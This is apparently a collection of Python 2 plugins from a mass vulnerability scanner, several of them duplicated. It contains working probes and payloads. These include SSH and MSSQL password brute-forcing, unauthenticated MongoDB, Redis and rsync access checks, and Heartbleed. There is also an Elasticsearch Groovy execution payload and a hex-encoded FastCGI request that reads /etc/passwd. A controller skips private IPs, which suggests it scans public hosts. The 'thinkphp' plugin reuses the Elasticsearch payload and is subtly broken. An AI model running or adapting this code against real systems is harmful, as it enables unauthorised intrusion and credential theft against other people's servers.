class WebIISPutPlugin(PluginBase): name = "WebIISPutPlugin" version = '1.0' def __init__(self): PluginBase.__init__(self) self.threadpool = ThreadPool(num_of_threads=20, num_of_work=10, daemon=True) def execute_run(self, ip, port, bdomain, taskid): self.threadpool.add_job(self.__test_iisput, ip, port) self.async_deal_into_db(bdomain, taskid) def __test_iisput(self, *args, **kwargs): ''' 验证是否存在iis PUT 漏洞 :param url: :return: ''' (ip, port) = args url = make_url(ip, port) txt_url = urlparse.urljoin(url, '1.txt') try: req = requests.put('%s' % txt_url, data="test!", timeout=2) if req.status_code == 201: #201 created return {'url': url, 'status': True} else: return {'url': url, 'status': False} except: return {'url': url, 'status': False} def async_deal_into_db(self, bdomain, taskid): ''' 入库 :return: ''' while not self.threadpool.resultQueue.empty(): try: result_dit = self.threadpool.resultQueue.get_nowait() if result_dit['status']: iis_vulurl = {} iis_vulurl['sid'] = taskid iis_vulurl['url'] = result_dit['url'] iis_vulurl['first_time'] = getCurTime() self.plugin_db.insert_by_dict(IISPUTVUL_TABLE, iis_vulurl) except: break def wait_for_complete(self, bdomain, taskid): #PluginBase.wait_for_complete(self) self.async_deal_into_db(bdomain, taskid) self.db_close()
class WebIISPutPlugin(PluginBase): name = "WebIISPutPlugin" version = '1.0' def __init__(self): PluginBase.__init__(self) self.threadpool = ThreadPool(num_of_threads= 20 , num_of_work= 10 , daemon = True) def execute_run(self, ip, port, bdomain, taskid): self.threadpool.add_job(self.__test_iisput, ip, port) self.async_deal_into_db(bdomain, taskid) def __test_iisput(self, *args, **kwargs): ''' 验证是否存在iis PUT 漏洞 :param url: :return: ''' (ip, port) = args url = make_url(ip, port) txt_url = urlparse.urljoin(url, '1.txt') try: req = requests.put('%s' % txt_url, data = "test!", timeout=2) if req.status_code == 201: #201 created return {'url':url, 'status': True} else: return {'url':url, 'status': False} except: return {'url':url, 'status': False} def async_deal_into_db(self, bdomain, taskid): ''' 入库 :return: ''' while not self.threadpool.resultQueue.empty(): try: result_dit = self.threadpool.resultQueue.get_nowait() if result_dit['status']: iis_vulurl = {} iis_vulurl['sid'] = taskid iis_vulurl['url'] = result_dit['url'] iis_vulurl['first_time'] = getCurTime() self.plugin_db.insert_by_dict(IISPUTVUL_TABLE, iis_vulurl) except: break def wait_for_complete(self, bdomain, taskid): #PluginBase.wait_for_complete(self) self.async_deal_into_db(bdomain, taskid) self.db_close()
class WebPathScanPlugin(PluginBase): name = "WebPathScanPlugin" version = '1.0' def __init__(self): PluginBase.__init__(self) self.threadpool = ThreadPool(num_of_threads=10, num_of_work=10, daemon=True) def execute_run(self, ip, port, bdomain, taskid): if bdomain == DOMAIN_TYPE[0]: webscan = WebScan(make_url(ip, port), webdomain=True, proxy=False) elif bdomain == DOMAIN_TYPE[1]: webscan = WebScan(make_url(ip, port), webdomain=False, proxy=False) self.threadpool.add_job(webscan.run) self.async_deal_into_db(bdomain, taskid) def wait_for_complete(self, bdomain, taskid): #PluginBase.wait_for_complete(self) self.async_deal_into_db(bdomain, taskid) self.db_close() def async_deal_into_db(self, bdomain, taskid): ''' 入库 :return: ''' while not self.threadpool.resultQueue.empty(): try: result_dit = self.threadpool.resultQueue.get(block=False) figerinfo = result_dit['figerinfo'] exist_result_list = result_dit['result_list'] for exist_result in exist_result_list: vulurl = {} vulurl['sid'] = taskid vulurl['url'] = exist_result['url'] vulurl['title'] = exist_result['title'] vulurl['keyword'] = '' vulurl['code'] = exist_result['http_code'] vulurl['figerinfo'] = figerinfo vulurl['first_time'] = getCurTime() if bdomain == DOMAIN_TYPE[0]: #sql = "insert into t_web_vulurl(`sid`, `url`, `title`, `keyword`, `code`, `figerinfo`, `first_time`) values('%s', '%s', '%s', '%s', '%s', '%s', '%s')" % (str(taskid), str(exist_result['url']) , str(exist_result['title']), '', str(exist_result['http_code']), figerinfo, getCurTime()) self.plugin_db.insert_by_dict(WEBVUL_TABLE, vulurl) elif bdomain == DOMAIN_TYPE[1]: self.plugin_db.insert_by_dict(WEBIPVUL_TABLE, vulurl) except Exception, e: logger.error(str(e)) break
class WebPathScanPlugin(PluginBase): name = "WebPathScanPlugin" version = '1.0' def __init__(self): PluginBase.__init__(self) self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True) def execute_run(self, ip, port, bdomain, taskid): if bdomain == DOMAIN_TYPE[0]: webscan = WebScan(make_url(ip, port), webdomain=True, proxy=False) elif bdomain == DOMAIN_TYPE[1]: webscan = WebScan(make_url(ip, port), webdomain=False, proxy = False) self.threadpool.add_job(webscan.run) self.async_deal_into_db(bdomain, taskid) def wait_for_complete(self, bdomain, taskid): #PluginBase.wait_for_complete(self) self.async_deal_into_db(bdomain, taskid) self.db_close() def async_deal_into_db(self, bdomain, taskid): ''' 入库 :return: ''' while not self.threadpool.resultQueue.empty(): try: result_dit = self.threadpool.resultQueue.get(block = False) figerinfo = result_dit['figerinfo'] exist_result_list = result_dit['result_list'] for exist_result in exist_result_list: vulurl = {} vulurl['sid'] = taskid vulurl['url'] = exist_result['url'] vulurl['title'] = exist_result['title'] vulurl['keyword'] = '' vulurl['code'] = exist_result['http_code'] vulurl['figerinfo'] = figerinfo vulurl['first_time'] = getCurTime() if bdomain == DOMAIN_TYPE[0]: #sql = "insert into t_web_vulurl(`sid`, `url`, `title`, `keyword`, `code`, `figerinfo`, `first_time`) values('%s', '%s', '%s', '%s', '%s', '%s', '%s')" % (str(taskid), str(exist_result['url']) , str(exist_result['title']), '', str(exist_result['http_code']), figerinfo, getCurTime()) self.plugin_db.insert_by_dict(WEBVUL_TABLE , vulurl) elif bdomain == DOMAIN_TYPE[1]: self.plugin_db.insert_by_dict(WEBIPVUL_TABLE, vulurl) except Exception,e: logger.error(str(e)) break
class MssqlCrackPlugin(PluginBase): name = "MssqlCrackPlugin" version = '1.0' def __init__(self): PluginBase.__init__(self) self.user_dict = 'mssqluser.txt' self.pass_dict = 'password.txt' self.service = 'mssql' self.threadpool = ThreadPool(num_of_threads=5, num_of_work=10, daemon=True) self.portlist = ['1433', '1434'] def execute_run(self, ip, port, taskid): if str(port) in self.portlist: mssqlcrack = PortCrackBase(self.user_dict, self.pass_dict) self.threadpool.add_job(mssqlcrack.crack, ip=ip, port=port, service=self.service) self.async_deal_into_db(taskid) def async_deal_into_db(self, taskid): ''' 异步入库 :return: ''' while not self.threadpool.resultQueue.empty(): try: result_dit = self.threadpool.resultQueue.get_nowait() portcrack_dic = {} portcrack_dic['sid'] = taskid portcrack_dic['host'] = result_dit['ip'] portcrack_dic['port'] = result_dit['port'] portcrack_dic['username'] = result_dit['username'] portcrack_dic['password'] = result_dit['password'] portcrack_dic['service'] = self.service portcrack_dic['first_time'] = getCurTime() self.plugin_db.insert_by_dict(PORTCRACK_TABLE, portcrack_dic) except: break def wait_for_complete(self): PluginBase.wait_for_complete(self) self.db_close()
class SSHCrackPlugin(PluginBase): name = "SSHCrackPlugin" version = '1.0' def __init__(self): PluginBase.__init__(self) self.user_dict = 'sshuser.txt' self.pass_dict = 'password.txt' self.service = 'ssh' self.threadpool = ThreadPool(num_of_threads= 5 , num_of_work= 10 , daemon = True) def execute_run(self, ip, port, taskid): if str(port) == '22': sshcrack = PortCrackBase(self.user_dict, self.pass_dict) self.threadpool.add_job(sshcrack.crack, ip = ip, port = port, service = self.service) self.async_deal_into_db(taskid) def async_deal_into_db(self, taskid): ''' 异步入库 :return: ''' while not self.threadpool.resultQueue.empty(): try: result_dit = self.threadpool.resultQueue.get_nowait() portcrack_dic = {} portcrack_dic['sid'] = taskid portcrack_dic['host'] = result_dit['ip'] portcrack_dic['port'] = result_dit['port'] portcrack_dic['username'] = result_dit['username'] portcrack_dic['password'] = result_dit['password'] portcrack_dic['service'] = self.service portcrack_dic['first_time'] = getCurTime() self.plugin_db.insert_by_dict(PORTCRACK_TABLE, portcrack_dic) except: break def wait_for_complete(self, taskid): PluginBase.wait_for_complete(self) self.db_close()
class MongodbUnauthPlugin(PluginBase): name = "MongodbUnauthPlugin" version = '1.0' description = 'mongodb匿名访问' def __init__(self): PluginBase.__init__(self) self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True) self.service = 'mongodb' self.port_list = ['27017', '28017'] def execute_run(self, ip, port, taskid): if str(port) in self.port_list: logger.info('[Mongodb] ip:%s, port:%s' % (str(ip), str(port))) self.threadpool.add_job(self.__test_mongodbunauth, ip, port) self.async_deal_into_db(taskid) def __test_mongodbunauth(self, *args, **kwargs): ''' 验证是否存在mongodb未授权访问漏洞 :param url: :return: ''' (ip, port) = args[0] bunauth = False try: connection = pymongo.MongoClient(ip, port, socketTimeoutMS=3000) dbname = connection.database_names() connection.close() #101.227.21.94:27017/[u'Log', u'db', u'config', u'admin'] #logger.info(ip + ":" + str(port) + '/' + str(dbname)) bunauth = True except Exception,e: pass return {'ip' : ip, 'status' : bunauth, 'port' : str(port)}
class RedisUnauthPlugin(PluginBase): name = "RedisUnauthPlugin" version = '1.0' description = 'redis匿名访问' def __init__(self): PluginBase.__init__(self) self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True) self.service = 'redis' self.port_list = ['6379'] def execute_run(self, ip, port, taskid): if str(port) in self.port_list: logger.info('[redis] ip:%s, port:%s' % (str(ip), str(port))) self.threadpool.add_job(self.__test_redisunauth, ip, port) self.async_deal_into_db(taskid) def __test_redisunauth(self, *args, **kwargs): ''' 验证是否存在redis未授权访问漏洞 :param url: :return: ''' (ip, port) = args[0] bunauth = False try: r = redis.StrictRedis(host=ip, port = int(port), db=0, socket_timeout = 2, socket_connect_timeout = 1) r.lpush('foo', 'bar') if r.rpop('foo') == 'bar': bunauth = True except Exception,e: pass return {'ip' : ip, 'port' : port, 'status' : bunauth}
class OpensslPlugin(PluginBase): name = "OpensslPlugin" version = '1.0' description = 'openssl heartbleed' def __init__(self): PluginBase.__init__(self) self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True) self.service = 'openssl' self.port_list = ['443', '8443', '9443'] def execute_run(self, ip, port, taskid): if str(port) in self.port_list: logger.info('[Openssl] ip:%s, port:%s' % (str(ip), str(port))) self.threadpool.add_job(self.__test_heartbleed, ip, port) self.async_deal_into_db(taskid) def __test_heartbleed(self, *args, **kwargs): ''' :param args: :param kwargs: :return: ''' (ip, port) = args[0] bvulnerable = False try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, int(port))) s.send(hello) while True: typ, ver, pay = recvmsg(s) if typ == None: s.close() if typ == 22 and ord(pay[0]) == 0x0E: break s.send(hb) if hit_hb(s): bvulnerable = True s.close() except: pass return {'ip':ip, 'port': port, 'status':bvulnerable} def async_deal_into_db(self, taskid): while not self.threadpool.resultQueue.empty(): try: result_dit = self.threadpool.resultQueue.get_nowait() if result_dit['status']: sysvul_dic = {} sysvul_dic['sid'] = taskid sysvul_dic['ip'] = result_dit['ip'] sysvul_dic['port'] = result_dit['port'] sysvul_dic['service'] = self.service sysvul_dic['first_time'] = getCurTime() self.plugin_db.insert_by_dict(SYSVUL_TABLE, sysvul_dic) except: break def wait_for_complete(self, taskid): #PluginBase.wait_for_complete(self) self.async_deal_into_db(taskid) self.db_close()
class EasGvyRemotePlugin(PluginBase): name = "EasGvyRemotePlugin" version = '1.0' description = 'eas grovy命令执行' def __init__(self): PluginBase.__init__(self) self.threadpool = ThreadPool(num_of_threads=10, num_of_work=10, daemon=True) self.service = 'easgvy' self.port_list = ['9200'] def execute_run(self, ip, port, taskid): if str(port) in self.port_list: self.threadpool.add_job(self.__test_easgvy, ip, port) self.async_deal_into_db(taskid) def __test_easgvy(self, *args, **kwargs): ''' :param url: :return: ''' (ip, port) = args[0] self.url = 'http://%s:%s/_search' % (ip, str(port)) payload = { "size": 1, "script_fields": { "POC": { "script": "java.lang.Math.class.forName(\"java.lang.Runtime\")", "lang": "groovy" } } } try: req = urllib2.Request(self.url, headers=HTTP_HEADERS, data=json.dumps(payload)) resp = urllib2.urlopen(req, timeout=3) json_content = json.loads(resp.read()) if json_content['hits']['hits'][0]['fields']['POC'][ 0] == 'class java.lang.Runtime': return {'ip': ip, 'port': port, 'status': True} else: return {'ip': ip, 'port': port, 'status': False} except: return {'ip': ip, 'port': port, 'status': False} def async_deal_into_db(self, taskid): ''' 异步入库 :return: ''' while not self.threadpool.resultQueue.empty(): try: result_dit = self.threadpool.resultQueue.get_nowait() print result_dit if result_dit['status']: sysvul_dic = {} sysvul_dic['sid'] = taskid sysvul_dic['ip'] = result_dit['ip'] sysvul_dic['port'] = result_dit['port'] sysvul_dic['service'] = self.service sysvul_dic['first_time'] = getCurTime() self.plugin_db.insert_by_dict(WEBAPP_KEY, sysvul_dic) except: break def wait_for_complete(self, taskid): #PluginBase.wait_for_complete(self) self.async_deal_into_db(taskid) self.db_close()
class PortScanPluginController(): ''' 端口扫描控制器 ''' def __init__(self, rediswork = None): self.cip_que = Queue.Queue(0) self.threadpool = None self.threadpool_count = 5 #线程池数 self.ps_db = PortScanDB().db self.rediswork = rediswork self.taskid = 0 def push_ip(self, ip, taskid): self.cip_que.put_nowait({'ip':ip,'taskid':taskid}) def get_ip_cnt(self): return self.cip_que.qsize() def run(self): self.threadpool = ThreadPool(num_of_threads= self.threadpool_count , num_of_work= 0 , daemon = False, timeout = 30) while self.cip_que.qsize() > 0: cip_dic = self.cip_que.get_nowait() self.taskid = cip_dic['taskid'] #判断是否是内网IP if not test_private_ip(cip_dic['ip']): logger.info('current scan ip %s' % cip_dic['ip']) nmap = NmapScan(ip = cip_dic['ip'], threads_num = 30) self.threadpool.add_job(nmap.run) else: logger.info('skip private ip:%s!' % cip_dic['ip']) time.sleep(0.5) if self.threadpool is not None: self.threadpool.wait_for_complete() #等待线程结束 self.insert_db() self.threadpool = None logger.info('port scan over!') self.vulplugin_dispatch() #开启扫描插件 logger.info('plugin start running......') def insert_db(self): ''' 结果导入数据库 ''' while self.threadpool.resultQueue.qsize() > 0: result = self.threadpool.resultQueue.get_nowait() for item in result: for port, service in item['scan_result'].iteritems(): if service is None or service == '': service = 'unknown' domainPortDic = {} domainPortDic['sid'] = self.taskid domainPortDic['ip'] = item['ip'] domainPortDic['port'] = port domainPortDic['service'] = service domainPortDic['first_time'] = getCurTime() self.ps_db.insert_by_dict(DOMAIN_PORT_TABLE, domainPortDic) #存入redis 队列 self.portScanDispatch(item['ip'], port) def portScanDispatch(self, ip, port): ''' 端口任务调度 ''' #判断当前端口是否存在Web访问 if port not in NOWEB_PORT: if test_webservice(ip, port): self.rediswork.pushvulInfo(keyname = WEBSCAN_KEY, ip = ip, port = port, taskid = self.taskid, type = DOMAIN_TYPE[1]) #bug修改 -----这里不能用elif啊 每个流程都需要走完才行 if CRACK_PORT.has_key(int(port)): self.rediswork.pushvulInfo(keyname = PORTCRACK_KEY, ip = ip, port = port, taskid = self.taskid) if SYSVUL_PORT.has_key(int(port)): self.rediswork.pushvulInfo(keyname = SYSVUL_KEY, ip = ip, port = port, taskid = self.taskid) def vulplugin_dispatch(self): webpathscan_dispath() portcrack_dispath() systemvul_dispath()
class FastcgiPlugin(PluginBase): name = "FastcgiPlugin" version = '1.0' description = 'fastcgi remote exec' def __init__(self): PluginBase.__init__(self) self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True) self.service = 'fastcgi' self.port_list = ['9000'] def execute_run(self, ip, port, taskid): if str(port) in self.port_list: logger.info('[fastcgi] ip:%s, port:%s' % (str(ip), str(port))) self.threadpool.add_job(self.__test_fastcgi, ip, port) self.async_deal_into_db(taskid) def __test_fastcgi(self, *args, **kwargs): ''' :param url: :return: ''' bvulnerable = False (ip, port) = args[0] sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM); sock.settimeout(5.0) sock.connect((ip, int(port))) data = """ 01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00 01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53 54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52 56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50 2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52 4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44 52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49 50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f 70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53 4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69 63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00 """ data_s = '' for _ in data.split(): data_s += chr(int(_,16)) sock.send(data_s) try: ret = sock.recv(1024) print ret if ret.find(':root:') > 0: bvulnerable = True else: bvulnerable = False except: pass sock.close() return {'ip':ip, 'port': port, 'status':bvulnerable} def async_deal_into_db(self, taskid): ''' 异步入库 :return: ''' while not self.threadpool.resultQueue.empty(): try: result_dit = self.threadpool.resultQueue.get_nowait() if result_dit['status']: sysvul_dic = {} sysvul_dic['sid'] = taskid sysvul_dic['ip'] = result_dit['ip'] sysvul_dic['port'] = result_dit['port'] sysvul_dic['service'] = self.service sysvul_dic['first_time'] = getCurTime() self.plugin_db.insert_by_dict(SYSVUL_TABLE, sysvul_dic) except: break def wait_for_complete(self, taskid): #PluginBase.wait_for_complete(self) self.async_deal_into_db(taskid) self.db_close()
class TpRemotePlugin(PluginBase): name = "TpRemotePlugin" version = '1.0' description = 'thinkphp 代码执行' def __init__(self): PluginBase.__init__(self) self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True) self.service = 'thinkphp' def execute_run(self, ip, port, taskid): self.threadpool.add_job(self.__test_tpexec, ip, port) self.async_deal_into_db(taskid) def __test_tpexec(self, *args, **kwargs): ''' :param url: :return: ''' (ip, port) = args[0] self.url = 'http://%s:%s/index.php' % (ip, str(port)) payload = {"size": 1,"script_fields": {"POC": {"script": "java.lang.Math.class.forName(\"java.lang.Runtime\")","lang": "groovy"}}} try: req = urllib2.Request(self.url, headers= HTTP_HEADERS, data = json.dumps(payload)) resp = urllib2.urlopen(req, timeout = 3) json_content = json.loads(resp.read()) if json_content['hits']['hits'][0]['fields']['POC'][0] == 'class java.lang.Runtime': return {'ip' : ip, 'port' : port, 'status' : True} else: return {'ip' : ip, 'port' : port, 'status' : False} except: return {'ip' : ip, 'port' : port, 'status' : False} def async_deal_into_db(self, taskid): ''' 异步入库 :return: ''' while not self.threadpool.resultQueue.empty(): try: result_dit = self.threadpool.resultQueue.get_nowait() print result_dit if result_dit['status']: sysvul_dic = {} sysvul_dic['sid'] = taskid sysvul_dic['ip'] = result_dit['ip'] sysvul_dic['port'] = result_dit['port'] sysvul_dic['service'] = self.service sysvul_dic['first_time'] = getCurTime() self.plugin_db.insert_by_dict(WEBAPP_KEY, sysvul_dic) except: break def wait_for_complete(self, taskid): #PluginBase.wait_for_complete(self) self.async_deal_into_db(taskid) self.db_close()
class RsyncUnauthPlugin(PluginBase): name = "RsyncUnauthPlugin" version = '1.0' description = 'rsync匿名访问' def __init__(self): PluginBase.__init__(self) self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True) self.service = 'rsync' self.rsync_dic_path = '%s/%s' % (DATA_DIC_PATH, 'rsync_dic/rsync.dic') #chmod 600 rsync.dic print self.rsync_dic_path self.port_list = ['873'] def execute_run(self, ip, port, taskid): if str(port) in self.port_list: logger.info('[rsync] ip:%s, port:%s' % (str(ip), str(port))) self.threadpool.add_job(self.run, ip, port) self.async_deal_into_db(taskid) def run(self, *args, **kwargs): global UNAUTH UNAUTH = False (ip, port) = args[0] if self.__test_rsyncunauth(ip): return {'ip':ip, 'port': port , 'status': True} else: return {'ip':ip, 'port': port , 'status': False} def __test_rsyncunauth(self, ip, data = ' '): ''' 验证是否存在rsync未授权访问漏洞 :param url: :return: ''' global UNAUTH cmd = 'rsync -v --password-file=' + self.rsync_dic_path + '--timeout=5 ' + ip + '::' + data print cmd (status, resp) = commands.getstatusoutput('rsync -v --password-file=' + self.rsync_dic_path + ' --timeout=5 ' + ip + '::' + data) if status == 0: #表示获取# 到敏感信息 if resp == '': return UNAUTH resp_dic = resp.split(' \t\n') for item in resp_dic: re_result = re.search(r'[dwrx-]{10}\s+[\d]+\s+[\d]{4}\/[\d]{1,2}\/[\d]{1,2}\s+[0-5]\d:[0-5]\d:[0-5]\d\s+(.*)', item) if re_result is not None: UNAUTH = True break if item != ' ': self.__test_rsyncunauth(ip, item[:item.find(' ')]) return UNAUTH else: return UNAUTH def async_deal_into_db(self, taskid): ''' 异步入库 :return: ''' while not self.threadpool.resultQueue.empty(): try: result_dit = self.threadpool.resultQueue.get_nowait() if result_dit['status']: sysvul_dic = {} sysvul_dic['sid'] = taskid sysvul_dic['ip'] = result_dit['ip'] sysvul_dic['port'] = result_dit['port'] sysvul_dic['service'] = self.service sysvul_dic['first_time'] = getCurTime() print sysvul_dic['ip'] + " success!!!" #self.plugin_db.insert_by_dict(SYSVUL_TABLE, sysvul_dic) except: break def wait_for_complete(self, taskid): #PluginBase.wait_for_complete(self) self.async_deal_into_db(taskid) self.db_close()
class RsyncUnauthPlugin(PluginBase): name = "RsyncUnauthPlugin" version = '1.0' description = 'rsync匿名访问' def __init__(self): PluginBase.__init__(self) self.threadpool = ThreadPool(num_of_threads=10, num_of_work=10, daemon=True) self.service = 'rsync' self.rsync_dic_path = '%s/%s' % (DATA_DIC_PATH, 'rsync_dic/rsync.dic' ) #chmod 600 rsync.dic print self.rsync_dic_path self.port_list = ['873'] def execute_run(self, ip, port, taskid): if str(port) in self.port_list: logger.info('[rsync] ip:%s, port:%s' % (str(ip), str(port))) self.threadpool.add_job(self.run, ip, port) self.async_deal_into_db(taskid) def run(self, *args, **kwargs): global UNAUTH UNAUTH = False (ip, port) = args[0] if self.__test_rsyncunauth(ip): return {'ip': ip, 'port': port, 'status': True} else: return {'ip': ip, 'port': port, 'status': False} def __test_rsyncunauth(self, ip, data=' '): ''' 验证是否存在rsync未授权访问漏洞 :param url: :return: ''' global UNAUTH cmd = 'rsync -v --password-file=' + self.rsync_dic_path + '--timeout=5 ' + ip + '::' + data print cmd (status, resp) = commands.getstatusoutput('rsync -v --password-file=' + self.rsync_dic_path + ' --timeout=5 ' + ip + '::' + data) if status == 0: #表示获取# 到敏感信息 if resp == '': return UNAUTH resp_dic = resp.split(' \t\n') for item in resp_dic: re_result = re.search( r'[dwrx-]{10}\s+[\d]+\s+[\d]{4}\/[\d]{1,2}\/[\d]{1,2}\s+[0-5]\d:[0-5]\d:[0-5]\d\s+(.*)', item) if re_result is not None: UNAUTH = True break if item != ' ': self.__test_rsyncunauth(ip, item[:item.find(' ')]) return UNAUTH else: return UNAUTH def async_deal_into_db(self, taskid): ''' 异步入库 :return: ''' while not self.threadpool.resultQueue.empty(): try: result_dit = self.threadpool.resultQueue.get_nowait() if result_dit['status']: sysvul_dic = {} sysvul_dic['sid'] = taskid sysvul_dic['ip'] = result_dit['ip'] sysvul_dic['port'] = result_dit['port'] sysvul_dic['service'] = self.service sysvul_dic['first_time'] = getCurTime() print sysvul_dic['ip'] + " success!!!" #self.plugin_db.insert_by_dict(SYSVUL_TABLE, sysvul_dic) except: break def wait_for_complete(self, taskid): #PluginBase.wait_for_complete(self) self.async_deal_into_db(taskid) self.db_close()
class FastcgiPlugin(PluginBase): name = "FastcgiPlugin" version = '1.0' description = 'fastcgi remote exec' def __init__(self): PluginBase.__init__(self) self.threadpool = ThreadPool(num_of_threads=10, num_of_work=10, daemon=True) self.service = 'fastcgi' self.port_list = ['9000'] def execute_run(self, ip, port, taskid): if str(port) in self.port_list: logger.info('[fastcgi] ip:%s, port:%s' % (str(ip), str(port))) self.threadpool.add_job(self.__test_fastcgi, ip, port) self.async_deal_into_db(taskid) def __test_fastcgi(self, *args, **kwargs): ''' :param url: :return: ''' bvulnerable = False (ip, port) = args[0] sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5.0) sock.connect((ip, int(port))) data = """ 01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00 01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53 54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52 56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50 2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52 4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44 52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49 50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f 70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53 4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69 63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00 """ data_s = '' for _ in data.split(): data_s += chr(int(_, 16)) sock.send(data_s) try: ret = sock.recv(1024) print ret if ret.find(':root:') > 0: bvulnerable = True else: bvulnerable = False except: pass sock.close() return {'ip': ip, 'port': port, 'status': bvulnerable} def async_deal_into_db(self, taskid): ''' 异步入库 :return: ''' while not self.threadpool.resultQueue.empty(): try: result_dit = self.threadpool.resultQueue.get_nowait() if result_dit['status']: sysvul_dic = {} sysvul_dic['sid'] = taskid sysvul_dic['ip'] = result_dit['ip'] sysvul_dic['port'] = result_dit['port'] sysvul_dic['service'] = self.service sysvul_dic['first_time'] = getCurTime() self.plugin_db.insert_by_dict(SYSVUL_TABLE, sysvul_dic) except: break def wait_for_complete(self, taskid): #PluginBase.wait_for_complete(self) self.async_deal_into_db(taskid) self.db_close()